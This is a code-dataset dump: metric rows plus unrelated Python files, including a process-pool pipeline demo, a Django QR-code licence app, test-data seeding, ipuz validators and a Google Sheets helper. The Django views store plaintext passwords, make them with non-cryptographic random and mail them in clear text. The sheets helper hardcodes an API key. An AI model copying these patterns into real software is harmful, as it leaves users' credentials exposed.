| 38.342767 | 157 | 0.584598 | 1,269 | 12,193 | 5.459417 | 0.253743 | 0.04157 | 0.046622 | 0.057592 | 0.365762 | 0.285508 | 0.182448 | 0.167436 | 0.141599 | 0.113453 | 0 | 0.012455 | 0.341507 | 12,193 | 317 | 158 | 38.463722 | 0.850417 | 0.033954 | 0 | 0.278986 | 0 | 0.018116 | 0.784652 | 0.055579 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018116 | false | 0.003623 | 0.021739 | 0.01087 | 0.061594 | 0.003623 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6b1abd24dcce5c1b223e996046c73de1b7c697fc
| 1,332 |
py
|
Python
|
Concurrent/PipelineDecomposingTask.py
|
rafagarciac/ParallelProgrammingPython
|
bba91984018688f41049fd63961d3b8872876336
|
[
"MIT"
] | null | null | null |
Concurrent/PipelineDecomposingTask.py
|
rafagarciac/ParallelProgrammingPython
|
bba91984018688f41049fd63961d3b8872876336
|
[
"MIT"
] | null | null | null |
Concurrent/PipelineDecomposingTask.py
|
rafagarciac/ParallelProgrammingPython
|
bba91984018688f41049fd63961d3b8872876336
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
Handcrafted pipeline example built without the multiprocessing Pipe class.
"""
__author__ = "Rafael García Cuéllar"
__email__ = "r.gc@hotmail.es"
__copyright__ = "Copyright (c) 2018 Rafael García Cuéllar"
__license__ = "MIT"
from concurrent.futures import ProcessPoolExecutor
import time
import random
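# Each stage sleeps for a random sub-second interval to simulate work,
# then passes its argument through unchanged.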
def worker(arg):
time.sleep(random.random())
return arg
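# The done-callbacks chain the stages: when a future in one pool
# completes, its result is submitted to the next pool in the pipeline.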
def pipeline(future):
pools[1].submit(worker, future.result()).add_done_callback(printer)
def printer(future):
pools[2].submit(worker, future.result()).add_done_callback(spout)
def spout(future):
print(future.result())
def instanceProcessPool():
pools = []
for i in range(3):
pool = ProcessPoolExecutor(2)
pools.append(pool)
return pools
def shutdownPools(pools):
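    # shutdown() defaults to wait=True, so each pool drains its pending
    # futures (and runs their done-callbacks) before the next is closed.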
for pool in pools:
pool.shutdown()
def runThreadsInPipeline(pools):
for pool in pools:
pool.submit(worker, random.random()).add_done_callback(pipeline)
if __name__ == "__main__":
__spec__ = None # Fix multiprocessing in Spyder's IPython
pools = instanceProcessPool() # pool = ProcessPoolExecutor([max_workers])
runThreadsInPipeline(pools) # pools[0].submit(worker, random.random()).add_done_callback(pipeline)
shutdownPools(pools) # pool.shutdown()
| 27.183673 | 107 | 0.678679 | 152 | 1,332 | 5.703947 | 0.473684 | 0.055363 | 0.069204 | 0.055363 | 0.251442 | 0.251442 | 0.198385 | 0.10842 | 0 | 0 | 0 | 0.008531 | 0.207958 | 1,332 | 49 | 108 | 27.183673 | 0.81327 | 0.173423 | 0 | 0.060606 | 0 | 0 | 0.080111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.212121 | false | 0 | 0.090909 | 0 | 0.363636 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6b2889ee02cbc2db0ebf9270a48b091ad3ca3b59
| 8,237 |
py
|
Python
|
core/views.py
|
Neelamegam2000/QRcode-for-license
|
a6d4c9655c5ba52b24c1ea737797557f06e0fcbf
|
[
"MIT"
] | null | null | null |
core/views.py
|
Neelamegam2000/QRcode-for-license
|
a6d4c9655c5ba52b24c1ea737797557f06e0fcbf
|
[
"MIT"
] | null | null | null |
core/views.py
|
Neelamegam2000/QRcode-for-license
|
a6d4c9655c5ba52b24c1ea737797557f06e0fcbf
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, redirect
from django.conf import settings
from django.core.files.storage import FileSystemStorage,default_storage
from django.core.mail import send_mail, EmailMessage
from core.models import Document
from core.forms import DocumentForm
from django.contrib import messages
import os
import pyqrcode
import png
import random
import base64
import cv2
import numpy as np
import pyzbar.pyzbar as pyzbar
def home(request):
documents= Document.objects.all()
return render(request, 'home.html', { 'documents': documents })
"""def simple_upload(request):
if request.method == 'POST' and request.FILES['myfile']:
myfile = request.FILES['myfile']
fs = FileSystemStorage()
filename = fs.save(myfile.name, myfile)
uploaded_file_url = fs.url(filename)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
media_path = os.path.join(BASE_DIR,'media')
full_path=os.path.join(media_path,myfile.name)
qr=pyqrcode.create(uploaded_file_url)
filename_before=filename.rsplit(".")
filename1=filename_before[0]+".png"
s=qr.png(filename1,scale=6)
'''from fpdf import FPDF
pdf=FPDF()
pdf.add_page()
pdf.image(filename1,x=50,y=None,w=60,h=60,type="",link=uploaded_file_url)'''
return render(request, 'simple_upload.html', {
'uploaded_file_url': uploaded_file_url
})
return render(request, 'simple_upload.html')"""
def model_form_upload(request):
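    # Saves the uploaded document, assigns a random 8-digit password,
    # base64-encodes the stored file path into a QR code image, and
    # e-mails the password (with the QR image attached) to the uploader.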
id=""
msg=""
if request.method == 'POST':
form = DocumentForm(request.POST, request.FILES,request.POST)
if form.is_valid():
form.save()
email=form.cleaned_data['Email']
document_count=Document.objects.values_list('document').count()
document_last=Document.objects.values_list('document')[document_count-1]
document_name=document_last[0]
print(email)
t=Document.objects.last()
num_list=['0','1','2','3','4','5','6','7','8','9']
password1=""
for i in range(0,8):
password1=password1+random.choice(num_list)
t.password=password1
print(type(document_name))
document_name1=document_name.encode('ascii')
document_encode=str(base64.b64encode(document_name1))
ax=document_encode[2:-1]
t.file_url=ax
print(ax)
t.save()
qr=pyqrcode.create(ax)
filename=document_name.rsplit(".")
filename1=filename[0].split("/")
filename2=filename1[1]+".png"
qr.png(filename2,scale=6)
"""mail=EmailMessage('QR',password1,'vmneelamegam2000@gmail.com',[email])
#mail.attach(filename2,filename2.content_type)
mail.send()"""
subject = 'QRcode scanner for license'
message = password1
email_from = settings.EMAIL_HOST_USER
recipient_list = [email, ]
mail=EmailMessage( subject, message, email_from, recipient_list )
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
mail.attach_file(os.path.join(BASE_DIR,filename2))
mail.send()
            msg="your file was uploaded successfully"
return redirect('model_form_upload')
else:
form = DocumentForm()
return render(request, 'model_form_upload.html', {'form': form,'msg':msg})
def mypass(request):
m=""
if(request.POST.get("pswd")==request.POST.get("pswd3")):
user_data=Document.objects.filter(Email=request.POST.get("email"),password=request.POST.get("old_pswd")).update(password=request.POST.get("pswd"))
user_data1=Document.objects.filter(Email=request.POST.get("email"),password=request.POST.get("pswd"))
"""if(len_user_data==1):
userdata.password=request.POST.get("pswd")
return render(request,'mypass.html',{u:"you have change the password successfully"})
else:"""
c=0
if(user_data1):
subject = 'QRcode scanner for license'
            message = "Password has been changed successfully"+" "+request.POST.get("pswd")
email_from = settings.EMAIL_HOST_USER
recipient_list = [request.POST.get("email"), ]
mail=EmailMessage( subject, message, email_from, recipient_list )
mail.send()
c=1
            m="your password was changed successfully"
elif(len(Document.objects.filter(Email=request.POST.get("email"),password=request.POST.get("old_pswd")))==0 and request.method=="POST"):
m="your email or password is incorrect"
else:
m=""
print(m)
return render(request,'mypass.html',{"m":m})
def user_req(request):
if("scanner" in request.POST and request.method=="POST"):
cap = cv2.VideoCapture(0+cv2.CAP_DSHOW)
font = cv2.FONT_HERSHEY_PLAIN
decodedObjects=[]
while decodedObjects==[]:
_, frame = cap.read()
decodedObjects = pyzbar.decode(frame)
for obj in decodedObjects:
points = obj.polygon
(x,y,w,h) = obj.rect
pts = np.array(points, np.int32)
pts = pts.reshape((-1, 1, 2))
cv2.polylines(frame, [pts], True, (0, 255, 0), 3)
cv2.putText(frame, str(obj.data), (50, 50), font, 2,
(255, 0, 0), 3)
id =obj.data.decode("utf-8")
cv2.imshow("QR Reader", frame)
key = cv2.waitKey(10) & 0xFF
if decodedObjects!=[] :
cv2.destroyAllWindows()
return render(request,"user_req.html",{"id":id})
if('proceed' in request.POST and request.method=="POST"):
userdata=Document.objects.filter(file_url=request.POST.get("id1")).filter(password=request.POST.get("password1"))
return render(request,"user_req.html",{"userdata":userdata})
return render(request,"user_req.html",)
def user(request):
return render(request,"user.html",)
def forget_pass(request):
msg=""
if(request.method=="POST"):
num_list=['0','1','2','3','4','5','6','7','8','9']
password1=""
for i in range(0,8):
password1=password1+random.choice(num_list)
user_data=Document.objects.filter(Email=request.POST.get("email")).update(password=password1)
subject = 'QRcode scanner for license Forget password'
        message = "Password has been changed successfully"+" "+password1
email_from = settings.EMAIL_HOST_USER
recipient_list = [request.POST.get("email"), ]
mail=EmailMessage( subject, message, email_from, recipient_list )
mail.send()
if(user_data>0):
            msg="your password was changed successfully and the mail was sent"
elif(user_data==0):
msg="your email is incorrect or not found"
return render(request,"forget_pass.html",{"msg":msg})
def qrcode_miss(request):
msg=""
if(request.method=='POST' and Document.objects.filter(Email=request.POST.get('email'),password=request.POST.get('password1'))):
user_data=Document.objects.values_list('document').filter(Email=request.POST.get('email'),password=request.POST.get('password1'))
m=user_data[0][0]
p=m.split('/')
print(p)
t=p[1]
print(t)
subject = 'QRcode scanner for license'
message = "resend"
email_from = settings.EMAIL_HOST_USER
recipient_list = [request.POST.get('email'),]
mail=EmailMessage( subject, message, email_from, recipient_list )
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
k=os.path.join(BASE_DIR,t)
print(k)
mail.attach_file(k)
mail.send()
        msg="your QR code was sent to your email"
elif(request.method=='POST'and Document.objects.values_list('document').filter(Email=request.POST.get('email'),password=request.POST.get('password1')).count()==0):
msg="your email or password is incorrect"
return render(request,'qrcode_miss.html',{"msg":msg})
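As a quick illustration of the token scheme used above, the QR payload is simply the base64-encoded storage path; a round-trip sketch with a hypothetical path:
# Round-trip sketch for the QR token; the document path is a placeholder.
import base64

token = base64.b64encode(b"documents/license.pdf").decode("ascii")
print(token)                                    # the value stored in file_url
print(base64.b64decode(token).decode("ascii"))  # -> documents/license.pdf
The view reaches the same string by slicing str(base64.b64encode(...)) with [2:-1]; calling .decode("ascii") is the tidier equivalent.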
| 42.901042 | 167 | 0.617701 | 1,016 | 8,237 | 4.889764 | 0.20374 | 0.059783 | 0.064815 | 0.038245 | 0.466787 | 0.367552 | 0.298712 | 0.285427 | 0.285427 | 0.253019 | 0 | 0.020186 | 0.2422 | 8,237 | 191 | 168 | 43.125654 | 0.775713 | 0 | 0 | 0.223684 | 0 | 0 | 0.124964 | 0.003171 | 0.013158 | 0 | 0.000577 | 0 | 0 | 1 | 0.046053 | false | 0.164474 | 0.098684 | 0.006579 | 0.210526 | 0.046053 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
6b2cec5a2588f39302333a5f4dacaf75c507b16b
| 3,344 |
py
|
Python
|
backend/api/management/commands/create_testdb.py
|
INSRapperswil/nornir-web
|
458e6b24bc373197044b4b7b5da74f16f93a9459
|
[
"MIT"
] | 2 |
2021-06-01T08:33:04.000Z
|
2021-08-20T04:22:39.000Z
|
backend/api/management/commands/create_testdb.py
|
INSRapperswil/nornir-web
|
458e6b24bc373197044b4b7b5da74f16f93a9459
|
[
"MIT"
] | null | null | null |
backend/api/management/commands/create_testdb.py
|
INSRapperswil/nornir-web
|
458e6b24bc373197044b4b7b5da74f16f93a9459
|
[
"MIT"
] | null | null | null |
"""
Setup DB with example data for tests
"""
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import User, Group
from django.core.management.base import BaseCommand
from api import models
class Command(BaseCommand):
help = 'Setup DB with example data for tests'
def handle(self, *args, **options):
print('---- Creating Users ----')
User.objects.get_or_create(username='thomastest', password=make_password('imatestin'))
thomas = User.objects.get(username='thomastest')
User.objects.get_or_create(username='norbert', password=make_password('netzwerk'))
norbert = User.objects.get(username='norbert')
User.objects.get_or_create(username='stefan', password=make_password('helldesk'))
stefan = User.objects.get(username='stefan')
superuser = Group.objects.get(name='superuser')
superuser.user_set.add(thomas)
netadmin = Group.objects.get(name='netadmin')
netadmin.user_set.add(norbert)
support = Group.objects.get(name='support')
support.user_set.add(stefan)
print('---- Creating Inventory ----')
models.Inventory.objects.create(name='Example', hosts_file='web_nornir/nornir_config/example_config/hosts.yaml',
groups_file='web_nornir/nornir_config/example_config/groups.yaml', type=1)
models.Inventory.objects.create(name='INS Lab', hosts_file='web_nornir/nornir_config/inslab_config/hosts.yaml',
groups_file='web_nornir/nornir_config/inslab_config/groups.yaml', type=1)
print('---- Creating Job Templates ----')
models.JobTemplate.objects.create(name='hello_world', description='This prints a hello world',
file_name='hello_world.py', created_by_id=1)
models.JobTemplate.objects.create(name='Get CDP Neighbors', description='Lists all CDP neighbors',
file_name='get_cdp_neighbors.py', created_by_id=1)
models.JobTemplate.objects.create(name='Get Interfaces',
description='Gets brief information about all interfaces, sh ip int br',
file_name='get_interfaces.py', created_by_id=1)
models.JobTemplate.objects.create(name='Ping Device',
description='Pings a chosen network device and reports if reachable',
file_name='ping.py', variables=['target'], created_by_id=1)
models.JobTemplate.objects.create(name='Get Configuration', description='Gets all configuration from device',
file_name='get_configuration.py', created_by_id=1)
print('---- Creating Tasks ----')
models.Task.objects.create(name='Get Hello World', created_by_id=1, template_id=1, inventory_id=1)
models.Task.objects.create(name='Get CDP neighbors of INS lab', created_by_id=2, template_id=2, inventory_id=2)
models.Task.objects.create(name='Get interfaces of INS lab', created_by_id=2, template_id=3, inventory_id=2)
print('---- ALL DONE!! ----')
| 54.819672 | 121 | 0.62201 | 387 | 3,344 | 5.21447 | 0.284238 | 0.06442 | 0.084242 | 0.035679 | 0.433598 | 0.35332 | 0.247275 | 0.173935 | 0.173935 | 0.098612 | 0 | 0.006486 | 0.262261 | 3,344 | 60 | 122 | 55.733333 | 0.811512 | 0.010766 | 0 | 0 | 0 | 0 | 0.283333 | 0.061728 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023256 | false | 0.093023 | 0.093023 | 0 | 0.162791 | 0.139535 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
6b2e543e1da4f0dd04f05a16bdaaac83f262d6ce
| 1,505 |
py
|
Python
|
ipuz/puzzlekinds/__init__.py
|
maiamcc/ipuz
|
fbe6f663b28ad42754622bf2d3bbe59a26be2615
|
[
"MIT"
] | 5 |
2015-06-23T17:18:41.000Z
|
2020-05-05T16:43:14.000Z
|
ipuz/puzzlekinds/__init__.py
|
maiamcc/ipuz
|
fbe6f663b28ad42754622bf2d3bbe59a26be2615
|
[
"MIT"
] | 3 |
2015-08-21T05:17:22.000Z
|
2021-03-20T18:39:31.000Z
|
ipuz/puzzlekinds/__init__.py
|
maiamcc/ipuz
|
fbe6f663b28ad42754622bf2d3bbe59a26be2615
|
[
"MIT"
] | 3 |
2018-01-15T17:28:10.000Z
|
2020-09-29T20:32:21.000Z
|
from .acrostic import IPUZ_ACROSTIC_VALIDATORS
from .answer import IPUZ_ANSWER_VALIDATORS
from .block import IPUZ_BLOCK_VALIDATORS
from .crossword import IPUZ_CROSSWORD_VALIDATORS
from .fill import IPUZ_FILL_VALIDATORS
from .sudoku import IPUZ_SUDOKU_VALIDATORS
from .wordsearch import IPUZ_WORDSEARCH_VALIDATORS
IPUZ_PUZZLEKINDS = {
"http://ipuz.org/acrostic": {
"mandatory": (
"puzzle",
),
"validators": {
1: IPUZ_ACROSTIC_VALIDATORS,
},
},
"http://ipuz.org/answer": {
"mandatory": (),
"validators": {
1: IPUZ_ANSWER_VALIDATORS,
},
},
"http://ipuz.org/block": {
"mandatory": (
"dimensions",
),
"validators": {
1: IPUZ_BLOCK_VALIDATORS,
},
},
"http://ipuz.org/crossword": {
"mandatory": (
"dimensions",
"puzzle",
),
"validators": {
1: IPUZ_CROSSWORD_VALIDATORS,
},
},
"http://ipuz.org/fill": {
"mandatory": (),
"validators": {
1: IPUZ_FILL_VALIDATORS,
},
},
"http://ipuz.org/sudoku": {
"mandatory": (
"puzzle",
),
"validators": {
1: IPUZ_SUDOKU_VALIDATORS,
},
},
"http://ipuz.org/wordsearch": {
"mandatory": (
"dimensions",
),
"validators": {
1: IPUZ_WORDSEARCH_VALIDATORS,
},
},
}
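A small lookup sketch against this registry; the kind URI and printed values come straight from the table above:
# Fetch the rules registered for one puzzle kind.
entry = IPUZ_PUZZLEKINDS["http://ipuz.org/crossword"]
print(entry["mandatory"])      # ('dimensions', 'puzzle')
print(entry["validators"][1])  # the version-1 field validators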
| 23.153846 | 50 | 0.509635 | 120 | 1,505 | 6.15 | 0.15 | 0.094851 | 0.104336 | 0.170732 | 0.173442 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007216 | 0.355482 | 1,505 | 64 | 51 | 23.515625 | 0.753608 | 0 | 0 | 0.403226 | 0 | 0 | 0.226578 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.112903 | 0 | 0.112903 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
6b385bed93debf4cc525192d73536e80c2566746
| 591 |
py
|
Python
|
python/ray/train/__init__.py
|
jamesliu/ray
|
11ab412db1fa3603a3006e8ed414e80dd1f11c0c
|
[
"Apache-2.0"
] | 33 |
2020-05-27T14:25:24.000Z
|
2022-03-22T06:11:30.000Z
|
python/ray/train/__init__.py
|
jamesliu/ray
|
11ab412db1fa3603a3006e8ed414e80dd1f11c0c
|
[
"Apache-2.0"
] | 227 |
2021-10-01T08:00:01.000Z
|
2021-12-28T16:47:26.000Z
|
python/ray/train/__init__.py
|
gramhagen/ray
|
c18caa4db36d466718bdbcb2229aa0b2dc03da1f
|
[
"Apache-2.0"
] | 5 |
2020-08-06T15:53:07.000Z
|
2022-02-09T03:31:31.000Z
|
from ray.train.backend import BackendConfig
from ray.train.callbacks import TrainingCallback
from ray.train.checkpoint import CheckpointStrategy
from ray.train.session import (get_dataset_shard, local_rank, load_checkpoint,
report, save_checkpoint, world_rank, world_size)
from ray.train.trainer import Trainer, TrainingIterator
__all__ = [
"BackendConfig", "CheckpointStrategy", "get_dataset_shard",
"load_checkpoint", "local_rank", "report", "save_checkpoint",
"TrainingIterator", "TrainingCallback", "Trainer", "world_rank",
"world_size"
]
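A usage sketch based only on the names re-exported here; the Trainer constructor arguments and backend string are assumptions about the surrounding Ray Train API, not defined in this file:
# Hedged sketch: backend name and worker count are assumed, not verified.
from ray.train import Trainer

def train_func():
    return 1  # a real user-defined training loop would go here

trainer = Trainer(backend="torch", num_workers=2)
trainer.start()
results = trainer.run(train_func)  # one result per worker
trainer.shutdown()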
| 42.214286 | 79 | 0.749577 | 64 | 591 | 6.640625 | 0.375 | 0.082353 | 0.141176 | 0.084706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153976 | 591 | 13 | 80 | 45.461538 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0.258883 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.416667 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
6b3deda0113b8eb8f9bdf6272cc95e4fe0c53714
| 2,743 |
py
|
Python
|
jupyanno/sheets.py
|
betatim/jupyanno
|
11fbb1825c8e6966260620758768e0e1fa5cecc9
|
[
"Apache-2.0"
] | 23 |
2018-08-24T16:48:20.000Z
|
2021-02-26T02:52:40.000Z
|
jupyanno/sheets.py
|
L3-data/jupyanno
|
6f6ec37e88b4d92f00bc359e7e39157b6b7f0eb5
|
[
"Apache-2.0"
] | 73 |
2018-08-13T07:56:15.000Z
|
2018-10-09T13:55:20.000Z
|
jupyanno/sheets.py
|
L3-data/jupyanno
|
6f6ec37e88b4d92f00bc359e7e39157b6b7f0eb5
|
[
"Apache-2.0"
] | 4 |
2018-08-13T07:55:50.000Z
|
2020-09-30T12:04:27.000Z
|
"""Code for reading and writing results to google sheets"""
from bs4 import BeautifulSoup
import requests
import warnings
import json
import pandas as pd
from six.moves.urllib.parse import urlparse, parse_qs
from six.moves.urllib.request import urlopen
_CELLSET_ID = "AIzaSyC8Zo-9EbXgHfqNzDxVb_YS_IIZBWtvoJ4"
def get_task_sheet(in_task):
return get_sheet_as_df(sheet_api_url(in_task.sheet_id), _CELLSET_ID)
def get_sheet_as_df(base_url, kk, columns="A:AG"):
"""
    Gets the sheet as a list of dicts (directly importable to pandas).
    :return: a DataFrame built from the sheet values, using the first
        row as column names; an empty DataFrame if the sheet is
        inaccessible.
"""
try:
# TODO: we should probably get the whole sheet
all_vals = "{base_url}/{cols}?key={kk}".format(base_url=base_url,
cols=columns,
kk=kk)
t_data = json.loads(urlopen(all_vals).read().decode('latin1'))[
'values']
frow = t_data.pop(0)
return pd.DataFrame([
dict([(key, '' if idx >= len(irow) else irow[idx])
for idx, key in enumerate(frow)]) for irow in
t_data])
except IOError as e:
warnings.warn(
'Sheet could not be accessed, check internet connectivity, \
proxies and permissions: {}'.format(
e))
return pd.DataFrame([{}])
def sheet_api_url(sheet_id):
return "https://sheets.googleapis.com/v4/spreadsheets/{id}/values".format(
id=sheet_id)
def get_questions(in_url):
res = urlopen(in_url)
soup = BeautifulSoup(res.read(), 'html.parser')
def get_names(f):
return [v for k, v in f.attrs.items() if 'label' in k]
def get_name(f):
return get_names(f)[0] if len(
get_names(f)) > 0 else 'unknown'
all_questions = soup.form.findChildren(
attrs={'name': lambda x: x and x.startswith('entry.')})
return {get_name(q): q['name'] for q in all_questions}
def submit_response(form_url, cur_questions, verbose=False, **answers):
submit_url = form_url.replace('/viewform', '/formResponse')
form_data = {'draftResponse': [],
'pageHistory': 0}
for v in cur_questions.values():
form_data[v] = ''
for k, v in answers.items():
if k in cur_questions:
form_data[cur_questions[k]] = v
else:
warnings.warn('Unknown Question: {}'.format(k), RuntimeWarning)
if verbose:
print(form_data)
user_agent = {'Referer': form_url,
'User-Agent': "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537\
.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36"}
return requests.post(submit_url, data=form_data, headers=user_agent)
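A hypothetical end-to-end sketch of these helpers; the sheet ID, form URL, and the "rating" question label are all placeholders:
# Hedged usage sketch; IDs, URLs, and the answer key are placeholders.
df = get_sheet_as_df(sheet_api_url("SHEET_ID"), _CELLSET_ID)
questions = get_questions("https://docs.google.com/forms/d/e/FORM_ID/viewform")
response = submit_response("https://docs.google.com/forms/d/e/FORM_ID/viewform",
                           questions, rating="5")
print(response.status_code)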
| 33.45122 | 79 | 0.606635 | 367 | 2,743 | 4.370572 | 0.427793 | 0.018703 | 0.016833 | 0.022444 | 0.009975 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018063 | 0.273423 | 2,743 | 81 | 80 | 33.864198 | 0.786754 | 0.063434 | 0 | 0 | 0 | 0.016949 | 0.101415 | 0.02555 | 0 | 0 | 0 | 0.012346 | 0 | 1 | 0.118644 | false | 0 | 0.118644 | 0.067797 | 0.372881 | 0.016949 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |